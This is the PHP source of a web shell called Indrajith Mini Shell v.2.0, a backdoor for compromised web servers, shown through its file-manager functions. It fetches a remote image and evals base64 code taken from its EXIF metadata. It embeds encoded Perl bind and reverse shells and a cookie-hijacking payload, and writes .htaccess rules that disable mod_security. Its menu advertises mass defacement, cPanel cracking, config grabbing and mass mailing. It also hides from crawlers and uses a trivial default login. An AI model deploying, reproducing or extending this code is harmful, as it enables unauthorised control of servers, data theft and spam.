Indirajith Mini shell

1. <?php
2.  
3. /*
4. * Indrajith Mini Shell v.2.0 with additional features....
5. * originally scripted by AJITH KP
6. * (c) Under Gnu General Public Licence 3(c)
7. * Team Open Fire and Indishell Family
8. * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
9. * Indishell : ASHELL, D@rkwolf.
10. * THA : THA RUDE [There is Nothing in Borders]
11. * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
12. */
13.  
14. /*------------------ LOGIN -------------------*/
15.  
16. $username="1";
17. $password="1";
18. $email="";
19.  
20. /*------------------ Login Data End ----------*/
21.  
22. @error_reporting(4);
23.  
24. /*------------------ Anti Crawler ------------*/
25. if(!empty($_SERVER['HTTP_USER_AGENT']))
26. {
27. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
29. {
30. header('HTTP/1.0 404 Not Found');
31. exit;
32. }
33. }
34. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
35. /*------------------ End of Anti Crawler -----*/
36. $BASED = exif_read_data("https://lh3.googleusercontent.com/-Ju6kHm5I5u4/V-sH3lGlWLI/AAAAAAAAAe4/7zFIt2wz3pUTV6GCFp3Ilkwo8lFMkdS8gCL0B/w318-d-h318-n/Indrajith.jpg");
37. eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
38. echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
39. echo "<style>
40. html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
41. #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
42. input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
43. loginbox td { border-radius:5px; font-size:11px; }
44. .header { size:25px; color:green; }
45. h1 { font-family:DigifaceWide; color:green; font-size:200%; }
46. h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
47. .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
48. .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
49. hr { border:1px solid #222222; }
50. #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
51. #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
52. #meunlist li { margin: 0px; padding: 0px; display: inline; }
53. #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
54. #meunlist a:hover { background: #333; color:green; }
55. .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }
56. .menu { font-size:25px; color: }
57. .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
58. .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
59. .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
60. #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
61. .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
62. .table a{ text-decoration:none; color:green; font-size:15px; }
63. .table a:hover{text-decoration:underline;}
64. .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
65. .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
66. .table tr:hover{ background:#181818; }
67. .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }
68. .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
69. .tbl a:hover{text-decoration:underline;}
70. .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }
71. .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
72. .tbl td:hover{ background:#181818; }
73. #alert {position: relative;}
74. #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
75. #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
76. #alert:target {display: none;}
77. .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
78. .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
79. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
80. </style>";
81. if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
82. {
83. if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
84. {
85. print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
86. if($email!="")
87. {
88. mail_alert();
89. }
90. }
91. else
92. {
93. if($_POST['usrname'])
94. {
95. print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
96. }
97. echo '<title>INDRAJITH SHELL v.2.0</title><center>
98. <div id=loginbox><p><font face="verdana,arial" size=-1>
99. <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
100. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
101. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
102. <tr><td bgcolor="black" style="padding:5">
103. <form method="post">
104. <input type="hidden" name="action" value="login">
105. <input type="hidden" name="hide" value="">
106. <center><table>
107. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
108. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
109. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
110. </div><br /></center>';
111. exit;
112. }
113. }
114.  
115. $color_g="green";
116. $color_b="4C83AF";
117. $color_bg="#111111";
118. $color_hr="#222";
119. $color_wri="green";
120. $color_rea="yellow";
121. $color_non="red";
122. $path=$_GET['path'];
123.  
124. @session_start();
125. @set_time_limit(0);
126. @ini_restore("safe_mode_include_dir");
127. @ini_restore("safe_mode_exec_dir");
128. @ini_restore("disable_functions");
129. @ini_restore("allow_url_fopen");
130. @ini_restore("safe_mode");
131. @ini_restore("open_basedir");
132. @ignore_user_abort(FALSE);
133. @ini_set('zlib.output_compression','Off');
134.  
135. $sep="/";
136. if(strtolower(substr(PHP_OS,0,3))=="win")
137. {
138. $os="win";
139. $sep="\\";
140. $ox="Windows";
141. }
142. else
143. {
144. $os="nix";
145. $ox="Linux";
146. }
147.  
148.  
149.  
150. $self=$_SERVER['PHP_SELF'];
151. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
152. $your_ip=$_SERVER['REMOTE_ADDR'];
153. $srvr_ip=$_SERVER['SERVER_ADDR'];
154. $admin=$_SERVER['SERVER_ADMIN'];
155.  
156. $s_php_ini="safe_mode=OFF
157. disable_functions=NONE";
158.  
159. $ini_php="<?
160. echo ini_get(\"safe_mode\");
161. echo ini_get(\"open_basedir\");
162. include(\$_GET[\"file\"]);
163. ini_restore(\"safe_mode\");
164. ini_restore(\"open_basedir\");
165. echo ini_get(\"safe_mode\");
166. echo ini_get(\"open_basedir\");
167. include(\$_GET[\"ss\"]);
168. ?>";
169.  
170. $s_htaccess="<IfModule mod_security.c>
171. Sec------Engine Off
172. Sec------ScanPOST Off
173. </IfModule>";
174.  
175. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
176. AddType application/x-httpd-cgi .sh
177. AddHandler cgi-script .pl
178. AddHandler cgi-script .pl";
179.  
180. $sym_htaccess="Options all
181. DirectoryIndex Sux.html
182. AddType text/plain .php
183. AddHandler server-parsed .php
184. AddType text/plain .html
185. AddHandler txt .html
186. Require None
187. Satisfy Any";
188.  
189. $sym_php_ini="safe_mode=OFF
190. disable_functions=NONE";
191.  
192. $forbid_dir="Options -Indexes";
193. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
194. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
195.  
196. /*----------------------- Top Menu ------------------------------------------*/
197.  
198. if($safemode=="On")
199. {
200. echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
201. }
202. else
203. {
204. echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
205. }
206.  
207. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
208.  
209. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
210. <table>
211. <tbody>
212. <tr>
213. <td style='border-right:1px solid #104E8B;' width=\"300px;\">
214. <div style='text-align:center;'>
215. <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
216. </div>
217. </td>
218. <td>
219. <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
220. ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
221. Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
222. MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
223. echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
224. echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
225. echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
226. echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
227. echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
228. echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
229. echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
230. <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
231. if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); }
232. else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
233. echo "
234. </div>
235. </td>
236. </tr>
237. </tbody>
238. </table></div>";
239. echo "<div class='menubar'> <div id=\"meunlist\">
240. <ul>
241. <li><a href=\"?\">HOME</a></li>
242. <li><a href=\"?symlink\">SymLink</a></li>
243. <li><a href=\"?rs\">((( Connect )))</a></li>
244. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
245. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
246. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
247. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
248. </ul>
249. <ul>
250. <li><a href=\"?massmailer\">Mass Mailer</a></li>
251. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
252. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
253. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
254. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
255. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
256. </ul>
257. <ul>
258. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
259. <li><a href=\"?sshman\">SSH Shell</a></li>
260. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
261. <li><a href=\"?ftpman\">FTP Manager</a></li>
262. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
263. <li><a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a></li>
264. <li><a href=\"?config_grab\">Config Grabber</a></li>
265. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
266. </ul>
267. </div></div>";
268. /*----------------------- End of Top Menu -----------------------------------*/
269.  
270.  
271. /*--------------- FUNCTIONS ----------------*/
272. function alert($alert_txt)
273. {
274. echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
275. }
276.  
277. function disabled_functns()
278. {
279. if(!@ini_get('disable_functions'))
280. {
281. echo "None";
282. }
283. else
284. {
285. echo @ini_get('disable_functions');
286. }
287. }
288.  
289.  
290. function drivesx()
291. {
292. foreach(range('A','Z') as $drive)
293. {
294. if(is_dir($drive.':\\'))
295. {
296. echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
297. }
298. }
299. }
300.  
301. function mail_alert()
302. {
303. global $email, $your_ip;
304. $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
305. $content_mail="Hello Master,\n
306. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
307. By Indrajith";
308. mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
309. }
310.  
311. function filesizex($size)
312. {
313. if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
314. elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
315. elseif ($size>=1024)$size = round(($size/1024),2)." KB";
316. else $size .= " B";
317. return $size;
318. }
319.  
320. function disc_size()
321. {
322. echo filesizex(disk_total_space("/"));
323. }
324.  
325. function freesize()
326. {
327. echo filesizex(disk_free_space("/"));
328. }
329.  
330. function file_perm($filz){
331. if($m=fileperms($filz)){
332. $p='';
333. $p .= ($m & 00400) ? 'r' : '-';
334. $p .= ($m & 00200) ? 'w' : '-';
335. $p .= ($m & 00100) ? 'x' : '-';
336. $p .= ($m & 00040) ? 'r' : '-';
337. $p .= ($m & 00020) ? 'w' : '-';
338. $p .= ($m & 00010) ? 'x' : '-';
339. $p .= ($m & 00004) ? 'r' : '-';
340. $p .= ($m & 00002) ? 'w' : '-';
341. $p .= ($m & 00001) ? 'x' : '-';
342. return $p;
343. }
344. else return "?????";
345. }
346.  
347.  
348. function mysqlx()
349. {
350. if(function_exists('mysql_connect'))
351. {
352. echo "<font color='red'>Enabled</font>";
353. }
354. else
355. {
356. echo "<font color='green'>Disabled</font>";
357. }
358. }
359.  
360. function oraclesx()
361. {
362. if(function_exists('oci_connect'))
363. {
364. echo "<font color='red'>Enabled</font>";
365. }
366. else
367. {
368. echo "<font color='green'>Disabled</font>";
369. }
370. }
371.  
372. function mssqlx()
373. {
374. if(function_exists('mssql_connect'))
375. {
376. echo "<font color='red'>Enabled</font>";
377. }
378. else
379. {
380. echo "<font color='green'>Disabled</font>";
381. }
382. }
383.  
384. function postgreyx()
385. {
386. if(function_exists('pg_connect'))
387. {
388. echo "<font color='red'>Enabled</font>";
389. }
390. else
391. {
392. echo "<font color='green'>Disabled</font>";
393. }
394. }
395.  
396. function strip($filx)
397. {
398. if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
399. return trim(urldecode(stripslashes($filx)));
400. }
401.  
402. function curlx()
403. {
404. if(function_exists('curl_version'))
405. {
406. echo "<font color='red'>Enabled</font>";
407. }
408. else
409. {
410. echo "<font color='green'>Disabled</font>";
411. }
412. }
413.  
414. function filesize_x($filex)
415. {
416. $f_size=filesizex(filesize($filex));
417. return $f_size;
418. }
419.  
420. function rename_ui()
421. {
422. $rf_path=$_GET['rename'];
423. echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
424. }
425.  
426. function filemanager_bg()
427. {
428. global $sep, $self;
429. $path=!empty($_GET['path'])?$_GET['path']:getcwd();
430. $dirs=array();
431. $fils=array();
432. if(is_dir($path))
433. {
434. chdir($path);
435. if($handle=opendir($path))
436. {
437. while(($item=readdir($handle))!==FALSE)
438. {
439. if($item=="."){continue;}
440. if($item==".."){continue;}
441. if(is_dir($item))
442. {
443. array_push($dirs, $path.$sep.$item);
444. }
445. else
446. {
447. array_push($fils, $path.$sep.$item);
448. }
449. }
450. }
451. else
452. {
453. alert("Access Denied for this operation");
454. }
455. }
456. else
457. {
458. alert("Directory Not Found!!!");
459. }
460. echo "<div id=result><table class=table>
461. <tr>
462. <th width='500px'>Name</th>
463. <th width='100px'>Size</th>
464. <th width='100px'>Permissions</th>
465. <th width='500px'>Actions</th>
466. </tr>";
467. foreach($dirs as $dir)
468. {
469. echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
470. <td>".filesize_x($dir)."</td>
471. <td><a href='{$self}?path={$path}&amp;perm={$dir}'>".file_perm($dir)."</a></td>
472. <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a></td></tr>";
473. }
474. foreach($fils as $fil)
475. {
476. echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>".basename($fil)."</a></td>
477. <td>".filesize_x($fil)."</td>
478. <td><a href='{$self}?path={$path}&amp;perm={$fil}'>".file_perm($fil)."</a></td>
479. <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a> </td>";
480. }
481. echo "</tr></table></div>";
482. }
483.  
484. function rename_bg()
485. {
486. if(isset($_GET['old_name']) && isset($_GET['new_name']))
487. {
488. $o_r_path=basename($_GET['old_name']);
489. $r_path=str_replace($o_r_path, "", $_GET['old_name']);
490. $r_new_name=$r_path.$_GET['new_name'];
491. echo $r_new_name;
492. if(rename($_GET['old_name'], $r_new_name)==FALSE)
493. {
494. alert("Access Denied for this action!!!");
495. }
496. else
497. {
498. alert("Renamed File Succeessfully");
499. }
500. }
501. }
502.  
503. function edit_file()
504. {
505. $path=$_GET['path'];
506. chdir($path);
507. $edt_file=$_GET['edit'];
508. $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
509. if($e_content)
510. {
511. $o_content=$e_content;
512. }
513. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
514. {
515. $fd = fopen($edt_file, "rb");
516. if(!$fd)
517. {
518. alert("Permission Denied");
519. }
520. else
521. {
522. while(!feof($fd))
523. {
524. $o_content=wordwrap(htmlspecialchars(fgets($fd)));
525. }
526. }
527. fclose($fd);
528. }
529. echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
530. <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
531. <input class='input_big' name='save' type='submit' value=' Save ' /><br /><br /><hr /><br /><br /></div>";
532. }
533. function edit_file_bg()
534. {
535. if(file_exists($_POST['e_file']))
536. {
537. $handle = fopen($_POST['e_file'],"w+");
538. if (!handle)
539. {
540. alert("Permission Denied");
541. }
542. else
543. {
544. fwrite($handle,$_POST['e_content_n']);
545. alert("Your changes were Successfully Saved!");
546. }
547. fclose($handle);
548. }
549. else
550. {
551. alert("File Not Found!!!");
552. }
553. }
554. function delete_file()
555. {
556. $del_file=$_GET['del_fil'];
557. if(unlink($del_file) != FALSE)
558. {
559. alert("Deleted Successfully");
560. exit;
561. }
562. else
563. {
564. alert("Access Denied for this Operation");
565. exit;
566. }
567. }
568. function deldirs($d_dir)
569. {
570. $d_files= glob($d_dir.'*', GLOB_MARK);
571. foreach($d_files as $d_file)
572. {
573. if(is_dir($d_file))
574. {
575. deldirs($d_file);
576. }
577. else
578. {
579. unlink($d_file);
580. }
581. }
582. if(is_dir($d_dir))
583. {
584. if(rmdir($d_dir))
585. {
586. alert("Deleted Directory Successfully");
587. }
588. else
589. {
590. alert("Access Denied for this Operation");
591. }
592. }
593. }
594.  
595. function code_viewer()
596. {
597. $path=$_GET['path'];
598. $r_file=$_GET['read'];
599. $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
600. if($r_content)
601. {
602. $rr_content=$r_content;
603. }
604. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
605. {
606. $fd = fopen($r_file, "rb");
607. if (!$fd)
608. {
609. alert("Permission Denied");
610. }
611. else
612. {
613. while(!feof($fd))
614. {
615. $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
616. }
617. }
618. fclose($fd);
619. }
620. echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&amp;edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
621. }
622. function copy_file_ui()
623. {
624. echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
625. }
626. function copy_file_bg()
627. {
628. global $sep;
629. if(function_exists(copy))
630. {
631. if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
632. {
633. alert("Succeded");
634. }
635. else
636. {
637. alert("Access Denied");
638. }
639. }
640. }
641. function ch_perm_bg()
642. {
643. if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
644. {
645. if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
646. {
647. alert("Succeded. Permission Changed!!!");
648. }
649. else
650. {
651. alert("Access Denied for This Operation");
652. }
653. }
654. }
655. function ch_perm_ui()
656. {
657. $p_file=$_GET['perm'];
658. echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
659. ch_perm_bg();
660. }
661. function mk_file_ui()
662. {
663. chdir($_GET['path']);
664. echo "<div id=result><br /><br /><font color=red><form method='GET'>
665. <input type='hidden' name='path' value=".getcwd().">
666. New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
667. <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
668. <input class='input_big' type='submit' value=' Save ' /></form></center></div>";
669. }
670. function mk_file_bg()
671. {
672. chdir($_GET['path']);
673. $c_path=$_GET['path'];
674. $c_file=$_GET['new_f_name'];
675. $c_file_contents=$_GET['n_file_content'];
676. $handle=fopen($c_file, "w");
677. if(!$handle)
678. {
679. alert("Permission Denied");
680. }
681. else
682. {
683. fwrite($handle,$c_file_contents);
684. alert("Your changes were Successfully Saved!");
685. }
686. fclose($handle);
687. }
688. function create_dir()
689. {
690. chdir($_GET['path']);
